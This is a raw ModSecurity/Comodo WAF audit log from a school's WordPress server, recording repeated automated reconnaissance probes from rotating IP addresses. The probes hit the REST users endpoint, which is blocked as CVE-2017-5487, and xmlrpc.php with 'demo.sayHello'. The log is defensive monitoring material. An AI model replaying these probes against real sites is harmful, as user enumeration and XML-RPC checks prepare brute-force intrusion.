1747506120548359 2322 (- - -) Stopwatch2: 1747506120548359 2322; combined=949, p1=329, p2=599, p3=0, p4=0, p5=21, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00918667-Z-- --a627e950-A-- [18/May/2025:01:22:08 +0700] aCjT0Om4kjNN-hEbWjJ8bwAAAFc 103.236.140.4 53040 103.236.140.4 8181 --a627e950-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.42 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a627e950-C-- demo.sayHello --a627e950-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a627e950-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506128220191 31390 (- - -) Stopwatch2: 1747506128220191 31390; combined=5942, p1=1197, p2=4427, p3=46, p4=63, p5=120, sr=87, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a627e950-Z-- --514d3c6d-A-- [18/May/2025:01:23:27 +0700] aCjUH-m4kjNN-hEbWjJ-0QAAAEU 103.236.140.4 59032 103.236.140.4 8181 --514d3c6d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --514d3c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --514d3c6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506207211876 18931 (- - -) Stopwatch2: 1747506207211876 18931; combined=4620, p1=3374, p2=1218, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --514d3c6d-Z-- --d3ea9b39-A-- [18/May/2025:01:23:35 +0700] aCjUJxKi5m5upc8uMd4MuAAAAMQ 103.236.140.4 59684 103.236.140.4 8181 --d3ea9b39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.52 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3ea9b39-C-- demo.sayHello --d3ea9b39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3ea9b39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506215500299 6705 (- - -) Stopwatch2: 1747506215500299 6705; combined=4764, p1=625, p2=3892, p3=33, p4=37, p5=103, sr=74, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3ea9b39-Z-- --3dfc5c55-A-- [18/May/2025:01:23:52 +0700] aCjUOHyxdQCiyU1ENFd8gwAAABU 103.236.140.4 32786 103.236.140.4 8181 --3dfc5c55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3dfc5c55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dfc5c55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506232834596 2581 (- - -) Stopwatch2: 1747506232834596 2581; combined=1581, p1=482, p2=1072, p3=0, p4=0, p5=27, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dfc5c55-Z-- --98d37423-A-- [18/May/2025:01:24:00 +0700] aCjUQBKi5m5upc8uMd4NggAAAMo 103.236.140.4 33332 103.236.140.4 8181 --98d37423-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --98d37423-C-- demo.sayHello --98d37423-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --98d37423-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506240634780 6113 (- - -) Stopwatch2: 1747506240634780 6113; combined=4674, p1=625, p2=3802, p3=43, p4=42, p5=97, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98d37423-Z-- --d06c2758-A-- [18/May/2025:01:26:08 +0700] aCjUwBKi5m5upc8uMd4Q7gAAAMo 103.236.140.4 42232 103.236.140.4 8181 --d06c2758-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d06c2758-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d06c2758-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506368304454 2321 (- - -) Stopwatch2: 1747506368304454 2321; combined=967, p1=330, p2=615, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d06c2758-Z-- --238aba39-A-- [18/May/2025:01:26:16 +0700] aCjUyATOsBn9MSWb6WK8YgAAAJY 103.236.140.4 42874 103.236.140.4 8181 --238aba39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --238aba39-C-- demo.sayHello --238aba39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --238aba39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506376234238 5624 (- - -) Stopwatch2: 1747506376234238 5624; combined=4189, p1=560, p2=3407, p3=32, p4=34, p5=92, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --238aba39-Z-- --43b80610-A-- [18/May/2025:01:26:34 +0700] aCjU2hKi5m5upc8uMd4RyQAAAMM 103.236.140.4 44298 103.236.140.4 8181 --43b80610-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --43b80610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43b80610-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506394996671 2853 (- - -) Stopwatch2: 1747506394996671 2853; combined=1453, p1=437, p2=990, p3=0, p4=0, p5=26, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b80610-Z-- --0730cb53-A-- [18/May/2025:01:26:44 +0700] aCjU5ATOsBn9MSWb6WK9NAAAAJA 103.236.140.4 45036 103.236.140.4 8181 --0730cb53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0730cb53-C-- demo.sayHello --0730cb53-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0730cb53-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506404690012 4710 (- - -) Stopwatch2: 1747506404690012 4710; combined=3379, p1=471, p2=2717, p3=30, p4=34, p5=75, sr=70, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0730cb53-Z-- --f982151e-A-- [18/May/2025:01:37:25 +0700] aCjXZRKi5m5upc8uMd4mCgAAAMo 103.236.140.4 37564 103.236.140.4 8181 --f982151e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f982151e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f982151e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507045364437 2649 (- - -) Stopwatch2: 1747507045364437 2649; combined=1204, p1=394, p2=778, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f982151e-Z-- --dff30f6f-A-- [18/May/2025:01:37:30 +0700] aCjXagTOsBn9MSWb6WLPhwAAAIo 103.236.140.4 37958 103.236.140.4 8181 --dff30f6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dff30f6f-C-- demo.sayHello --dff30f6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dff30f6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507050361405 6189 (- - -) Stopwatch2: 1747507050361405 6189; combined=4743, p1=637, p2=3821, p3=46, p4=61, p5=109, sr=63, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dff30f6f-Z-- --41dee109-A-- [18/May/2025:01:39:11 +0700] aCjXzxKi5m5upc8uMd4pEAAAAMU 103.236.140.4 45410 103.236.140.4 8181 --41dee109-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41dee109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41dee109-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507151415443 2722 (- - -) Stopwatch2: 1747507151415443 2722; combined=1387, p1=420, p2=944, p3=0, p4=0, p5=23, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41dee109-Z-- --0df02734-A-- [18/May/2025:01:39:17 +0700] aCjX1RKi5m5upc8uMd4pQQAAAMI 103.236.140.4 45834 103.236.140.4 8181 --0df02734-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0df02734-C-- demo.sayHello --0df02734-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0df02734-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507157242218 5968 (- - -) Stopwatch2: 1747507157242218 5968; combined=4790, p1=531, p2=3987, p3=56, p4=66, p5=89, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df02734-Z-- --53aa4053-A-- [18/May/2025:01:41:52 +0700] aCjYcHyxdQCiyU1ENFeZqgAAAAA 103.236.140.4 57542 103.236.140.4 8181 --53aa4053-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --53aa4053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53aa4053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507312250037 2413 (- - -) Stopwatch2: 1747507312250037 2413; combined=1025, p1=362, p2=637, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53aa4053-Z-- --6c6cfa40-A-- [18/May/2025:01:42:00 +0700] aCjYeBKi5m5upc8uMd4tzwAAANg 103.236.140.4 58250 103.236.140.4 8181 --6c6cfa40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c6cfa40-C-- demo.sayHello --6c6cfa40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c6cfa40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507320448888 4413 (- - -) Stopwatch2: 1747507320448888 4413; combined=3353, p1=423, p2=2701, p3=29, p4=30, p5=97, sr=52, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c6cfa40-Z-- --a998eb28-A-- [18/May/2025:01:43:01 +0700] aCjYtQTOsBn9MSWb6WLY_QAAAIY 103.236.140.4 34216 103.236.140.4 8181 --a998eb28-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a998eb28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a998eb28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507381096774 3411 (- - -) Stopwatch2: 1747507381096774 3411; combined=2032, p1=592, p2=1408, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a998eb28-Z-- --6971ae22-A-- [18/May/2025:01:43:07 +0700] aCjYu-m4kjNN-hEbWjKfQwAAAEE 103.236.140.4 34466 103.236.140.4 8181 --6971ae22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6971ae22-C-- demo.sayHello --6971ae22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6971ae22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 